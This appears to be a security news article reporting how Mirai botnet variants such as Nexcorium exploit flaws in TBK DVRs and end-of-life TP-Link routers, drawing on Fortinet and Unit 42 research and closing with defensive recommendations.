Mirai Botnet Variants Exploit Vulnerabilities in End-of-Life Devices, Threatening IoT Security

Threat actors are aggressively targeting Internet of Things (IoT) devices, specifically leveraging security flaws in older TBK DVRs and end-of-life (EoL) TP-Link Wi-Fi routers to deploy sophisticated Mirai botnet variants. This ongoing campaign, detailed by researchers at Fortinet’s FortiGuard Labs and Palo Alto Networks Unit 42, highlights a persistent and evolving threat to the security of connected devices, with implications reaching beyond individual compromises to potentially large-scale distributed denial-of-service (DDoS) attacks.

The Nexcorium Campaign: Exploiting Known Flaws for Botnet Dominance

The primary focus of recent investigations is the emergence of a Mirai variant dubbed "Nexcorium." This malware is actively being deployed by exploiting CVE-2024-3721, a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recording devices. The Common Vulnerability Scoring System (CVSS) score of 6.3 for CVE-2024-3721 indicates a notable risk, making these devices an attractive target for attackers seeking easy entry points.

According to security researcher Vincent Li, "IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks." This statement underscores the fundamental challenges in securing the vast and often neglected IoT ecosystem.

The exploitation chain for Nexcorium begins with the successful injection of commands via CVE-2024-3721. This allows attackers to download and execute a downloader script, which in turn deploys the botnet payload. The malware is designed to be architecture-aware, adapting its execution based on the underlying Linux system. Upon successful infection, a stark message, "nexuscorp has taken control," often appears on compromised devices, signaling the establishment of the attacker’s command.

A Deep Dive into Nexcorium’s Capabilities

Fortinet’s analysis reveals that Nexcorium shares a significant architectural resemblance to its Mirai predecessors. Key features include an XOR-encoded configuration table initialization, a watchdog module designed to ensure the malware’s continuous operation, and a robust DDoS attack module. This modular design allows the botnet to be versatile and effective in carrying out its malicious objectives.

Beyond its core functionalities, Nexcorium demonstrates a proactive approach to expanding its reach and evading detection. The malware incorporates an exploit for CVE-2017-17215, a vulnerability previously targeting Huawei HG532 devices. This allows infected machines to scan for and compromise other vulnerable devices within the network. Furthermore, Nexcorium maintains a list of hard-coded usernames and passwords, which it systematically uses in brute-force attacks over Telnet connections to gain unauthorized access to other hosts.

Once Telnet authentication is successful, the malware proceeds to obtain a shell, establish persistence by manipulating crontab entries and systemd services, and then communicates with an external command-and-control (C2) server. From this C2 server, the botnet receives instructions to launch various DDoS attacks, utilizing UDP, TCP, and SMTP protocols. To further obfuscate its presence, upon establishing persistence, Nexcorium is programmed to delete the original downloaded binary, making forensic analysis more challenging.

Fortinet’s report emphasizes Nexcorium’s adherence to modern IoT botnet characteristics: "The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach."

The Shadow of End-of-Life Devices: TP-Link Routers Under Fire

The threat landscape is further complicated by the exploitation of vulnerabilities in end-of-life (EoL) TP-Link Wi-Fi routers. Palo Alto Networks Unit 42 has observed active, automated scanning and probing activities targeting CVE-2023-33538, a command injection vulnerability with a higher CVSS score of 8.8. This vulnerability affects specific TP-Link wireless router models that are no longer supported by the manufacturer.

While the observed in-the-wild exploitation attempts for CVE-2023-33538 have been described as "flawed" and unsuccessful, the underlying vulnerability remains a significant concern. Unit 42 researchers Asher Davila, Malav Vyas, and Chris Navarrete noted, "Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real. Successful exploitation requires authentication to the router’s web interface." This implies that attackers with valid credentials could potentially exploit this flaw.

The security implications of CVE-2023-33538 were recognized by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added it to its Known Exploited Vulnerabilities (KEV) catalog in June 2025. This inclusion signals that the vulnerability is actively being exploited by malicious actors and poses a significant risk to government agencies and organizations.

The source code associated with the attempted exploitation of CVE-2023-33538 contains numerous references to the string "Condi," suggesting a possible link to a previously identified malware family. Furthermore, this variant possesses the capability to self-update with newer versions and can function as a web server, actively seeking to infect other devices that connect to it.

A Recurring Threat: The Mirai Legacy and Evolving Tactics

This is not the first time that CVE-2024-3721 has been weaponized. Over the past year, the same security flaw has been exploited to deploy not only Mirai variants but also a relatively new botnet named RondoDox. In September 2025, security firm CloudSEK also disclosed details of a large-scale "loader-as-a-service" botnet that was actively distributing RondoDox, Mirai, and Morte payloads. This operation leveraged weak credentials and known vulnerabilities in routers, IoT devices, and enterprise applications, highlighting a multi-faceted approach by threat actors.

The persistence of Mirai and its derivatives in the threat landscape is a testament to their effectiveness and the sheer volume of vulnerable IoT devices available. Mirai, first discovered in 2016, gained notoriety for its ability to harness the power of compromised IoT devices to launch massive DDoS attacks. Its continued evolution and adaptation by various threat groups underscore the enduring challenge of securing this ecosystem.

Broader Implications and the Imperative of Device Security

The exploitation of vulnerabilities in EoL devices presents a critical dilemma for consumers and businesses alike. Manufacturers discontinuing support for older hardware leaves a significant installed base vulnerable to known exploits. The fact that these devices are often deployed and then forgotten, with default credentials rarely changed, exacerbates the problem.

Unit 42’s analysis of the TP-Link situation emphasizes this point: "For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices. These credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers."

The implications of these ongoing attacks are far-reaching. Successful compromises can lead to:

• Large-Scale DDoS Attacks: Botnets comprised of thousands or even millions of compromised devices can generate overwhelming traffic, disrupting online services, websites, and critical infrastructure.
• Network Intrusion: Once inside a network, compromised IoT devices can serve as a pivot point for attackers to move laterally and compromise other, more sensitive systems.
• Data Theft and Surveillance: Certain IoT devices, like DVRs, handle sensitive data. Their compromise could lead to unauthorized access and surveillance.
• Ransomware and Malware Distribution: Botnets can be used to distribute other forms of malware, including ransomware, further escalating the damage.

Recommendations and the Path Forward

The findings from Fortinet and Palo Alto Networks serve as a stark reminder of the need for proactive security measures. The following recommendations are crucial for mitigating the risks associated with vulnerable IoT devices:

• Device Replacement: Users of TBK DVRs and EoL TP-Link routers should prioritize replacing these devices with newer, supported models.
• Firmware Updates: Regularly update the firmware of all IoT devices and network equipment to patch known vulnerabilities.
• Default Credential Changes: Always change default usernames and passwords on new devices. Utilize strong, unique passwords for all connected devices and services.
• Network Segmentation: For businesses, implementing network segmentation can help isolate IoT devices and limit the potential impact of a compromise.
• Security Monitoring: Employ security monitoring solutions to detect unusual network traffic or suspicious activity indicative of a compromise.
• Awareness and Education: Promote awareness about the security risks associated with IoT devices and the importance of secure configuration practices.

The persistent exploitation of vulnerabilities in IoT devices, particularly those that are end-of-life, underscores a fundamental weakness in the current digital infrastructure. As the number of connected devices continues to grow exponentially, the strategies employed by threat actors will undoubtedly evolve. The ongoing battle against botnets like Mirai and its variants necessitates a concerted effort from manufacturers, security researchers, and end-users to build a more resilient and secure connected future. The message is clear: neglecting IoT security is no longer an option, but a direct invitation to compromise.